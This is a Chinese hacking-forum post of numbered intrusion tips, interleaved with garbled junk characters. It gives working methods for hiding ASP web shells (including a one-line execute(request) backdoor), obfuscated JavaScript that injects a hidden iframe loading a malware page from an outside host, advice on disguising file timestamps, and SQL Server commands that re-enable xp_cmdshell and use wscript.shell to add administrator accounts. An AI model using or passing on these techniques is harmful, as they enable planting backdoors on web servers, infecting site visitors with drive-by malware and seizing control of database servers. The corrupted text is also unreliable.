& A1 c! A: ^+ F
; ^: a: _+ [/ v8 a! @0 e, b53、隐藏ASP后门的两种方法
$ Y8 f9 L( P. |" b' J. ?1、建立非标准目录:mkdir images..\
) r3 r) m% z& Q! }( S拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp4 O2 b0 T5 Y! F: o5 k3 C0 @
通过web访问ASP木马:http://ip/images../news.asp?action=login
$ S0 n/ R/ ^# r4 G, J) S如何删除非标准目录:rmdir images..\ /s% |: Q/ l# O4 O$ z& H3 ?- I
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 Q! u0 j2 K" F9 s% H- qmkdir programme.asp
" Q. V/ t+ w5 A9 K7 L p3 X1 z9 p新建1.txt文件内容:<!--#include file=”12.jpg”-->
" K& H; A- X4 U" j$ p" D新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 m4 E2 c8 h& S% u, s# _0 ], r2 ]
attrib +H +S programme.asp
9 E" J7 D3 c/ h9 C: v9 \% t通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, B' R3 b& I8 ^0 c$ l- _* ?5 }3 ~8 X! D9 _; x ^
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
2 \$ T0 u1 R% t# {( g. V8 Q" |' @* z+ k然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( U2 ^2 b' ? b2 Q; F; }3 |' m0 h7 s9 P5 x5 L9 s* ^
55、JS隐蔽挂马
8 j& K7 a( u8 ], u5 V& r1.
V' w; x' N- Z& u5 |2 J) avar tr4c3="<iframe src=ht";' V5 v3 s: w+ B! P
tr4c3 = tr4c3+"tp:/";2 \& }( C. c4 X2 K* Q( s
tr4c3 = tr4c3+"/ww";
0 j9 y/ j. u" n. J: F1 ~tr4c3 = tr4c3+"w.tr4";
/ j& A- j4 h! r9 \ Ptr4c3 = tr4c3+"c3.com/inc/m";
6 W5 l, L6 K1 J' x) ~8 s$ R$ b, @+ |tr4c3 = tr4c3+"m.htm style="display:none"></i";
# R9 p5 u# S3 S$ Ktr4c3 =tr4c3+"frame>'";
/ \% V) ~( i% r2 V. o3 X B! v) edocument.write(tr4c3);
2 B! c; g/ w' p" }避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。: {- ]- H* a" Y% e7 D1 d9 h/ v
& f! E' K$ {0 L- o2.9 L" @: b: F [5 W2 ]2 h
转换进制,然后用EVAL执行。如
; V$ R2 X- [1 Z( R9 q8 P. veval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; A6 E6 k( J% M T7 ?
不过这个有点显眼。
2 Y6 O# r! Q: l$ x/ d3 L. t3.* W* `0 T1 m4 Q9 N7 O5 z8 W+ W
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
$ m9 |8 T L" a- j最后一点,别忘了把文件的时间也修改下。
' M8 [" w( E5 c( @1 {- a
1 N3 p% Z: ]) p' [1 Q56.3389终端入侵常用DOS命令
+ g& r4 E' Y1 p2 h8 y1 Ztaskkill taskkill /PID 1248 /t
# |# q+ Z' {4 t. [& G
5 a& u1 Y# O. l4 W3 m. P* M* J$ f7 Ztasklist 查进程5 {+ B2 ~7 C' @5 e
3 t1 o. p) q% V/ p( L, y
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
) Q* Z6 A' `; Oiisreset /reboot
; R) l8 V. x' dtsshutdn /reboot /delay:1 重起服务器 Y7 s; ^8 i6 k7 _
! r( h9 E, u/ `) ]& v: `logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 W; y4 P. f* x5 l. T
/ \' `! U, F: B) d [5 C! x% y* U! `query user 查看当前终端用户在线情况
6 W/ ? _' K( i* r( w3 L1 Q% E4 ^/ N( N
要显示有关所有会话使用的进程的信息,请键入:query process *% X* I# n; c' O+ [4 ~3 {0 q
0 s" e/ o; l& T. V9 D5 @要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2+ J# [+ A R6 e, n$ y! F" x) R
7 R0 O6 F' n2 O" J要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2* ~9 g4 y. Q$ O! `8 H5 H2 i
7 \/ W# f0 ~1 m# r要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
; Z7 g8 _/ X; @1 @, E2 ^9 w @- ?9 v- z9 @/ ^9 b% q
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( E" [, g. {6 P3 D: j
2 V/ R. b% D! `4 n2 ^+ ]# q% B1 X
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统6 F9 A9 | K# j- F" [7 ^
3 I9 q+ n: r3 y/ V; R% j; }命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。" e3 h7 q. P) w" K$ G# Q6 s, q+ |$ X
0 i. _$ {+ Z6 I) ^. t: Y: q- L7 n
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机) a/ {; o1 f! m$ x" ^
7 s5 \: I9 |1 Y* e% d; f56、在地址栏或按Ctrl+O,输入:
1 T! B0 X1 y# c; s1 Vjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
9 G6 n {. V8 G! O. r
. Q9 }! Q0 `1 ?. \. v源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" B; A, f: F7 a# T' N
* k* A# J4 Q& v- u4 s' W3 D57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% J; G& W2 e0 h9 Z5 b用net localgroup administrators是可以看到管理组下,加了$的用户的。
0 A/ L. f/ K5 } E' {5 ?# s# B' Q! I2 @
58、 sa弱口令相关命令
: y. ^/ [) e1 K; U) s
8 J8 X, E: k1 r. J& Q一.更改sa口令方法:/ v8 P& t! D4 ?) y, Y
用sql综合利用工具连接后,执行命令:
( W3 n# p+ s, B1 A) J2 B3 S/ oexec sp_password NULL,'20001001','sa'
' t; t/ r. x( H. X(提示:慎用!)8 z R& ?4 Q) l" Y8 t$ @! y
* g" P" P; \* T4 K
二.简单修补sa弱口令.
; A3 n6 |$ K# k1 G
% N# q% C. R/ ]. @1 {方法1:查询分离器连接后执行:- p1 \1 {/ `' q8 u. N
if exists (select * from
/ u: A- g; T5 _3 H5 |0 y& fdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and% G: x5 O' d0 Y. C6 o' V; Y
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
. E# d9 z( q. g5 z( R6 n$ v7 F. g0 Y$ G$ _( F2 _
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
7 N' v8 Z" v3 R5 h* O" o; d- t
' d' T' m% \9 O5 U& U7 \1 _( {) fGO
2 \2 {' ?) T3 f( H
" ^ L9 U) a- [# I然后按F5键命令执行完毕
: E1 ? F5 ?0 n% [4 @1 T8 F0 R4 j$ b: m' p+ k$ P0 z5 f
方法2:查询分离器连接后% Y1 E a7 R# e5 s0 ?" J
第一步执行:use master! d1 a9 \2 k0 B. i, G l- M8 N
第二步执行:sp_dropextendedproc 'xp_cmdshell'+ K! z# h4 N( ]* @9 v
然后按F5键命令执行完毕7 c6 \) C0 [5 M+ g- h. w0 F$ y
/ l+ U, ~' o+ s- L4 l! |
3 \( k0 f: }9 K0 X三.常见情况恢复执行xp_cmdshell.
& R" M' i* [9 y; S
2 s0 Z# ?9 C. i% r: ~; d7 C0 e* |, ?" i/ P+ y$ W# S
1 未能找到存储过程'master..xpcmdshell'.
( |6 F# r6 h, H$ V 恢复方法:查询分离器连接后,
/ v% Z' k- a# s- _- d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int& g, c9 v4 N1 Q; H" T/ x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' W8 g" V/ d) y' L9 F# X4 Q2 ^
然后按F5键命令执行完毕+ `; V, a, S" h
4 U5 f9 w) l9 [# n4 h
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, X" L: P) x: X恢复方法:查询分离器连接后,* Y# I% E* Y9 R" z
第一步执行:sp_dropextendedproc "xp_cmdshell"0 K6 g I: l( H4 G
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'8 p( D- `$ n% _, D
然后按F5键命令执行完毕) ]. Q; ?5 i' a8 |/ \' t1 c
( F9 E( K; n4 ~" @& k( q6 }0 P
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( H/ c* \( a6 J; F
恢复方法:查询分离器连接后,8 [9 x5 Y- t# c, z* R& s M
第一步执行:exec sp_dropextendedproc 'xp_cmdshell', l( S9 T% b8 g& `7 k
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* b P0 `, \% N3 V$ \然后按F5键命令执行完毕% `; h' f5 J/ @$ \4 p7 ^
3 k' s, Z" z; _% G, @7 Z
四.终极方法." \1 w3 g& `: T' t8 ]
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 _, n4 \6 x- i1 h& G! P4 J, w( {, @
查询分离器连接后,+ H6 d: X7 ?2 A) ~' I! D8 u [
2000servser系统:
; H4 D7 _# g# H9 B1 u9 P& }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add', J' z5 g0 L' X
( S. `5 o9 ~" I6 V, l5 w' gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'% t/ ?) B. K0 y4 P
, Y% v9 H0 G" d! ?+ F9 \1 l
xp或2003server系统:- h. j; ~* ]7 ~) [
, d) y! C7 @- @. w; N/ F' I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
! p7 Q: g0 u, _) B4 V
. ^* {. Q' F8 ?# O/ ^/ v; N/ N6 b, udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. n$ X3 n; O$ C% x$ U |
发表于 2012-9-15 14:13:15
收藏
支持
反对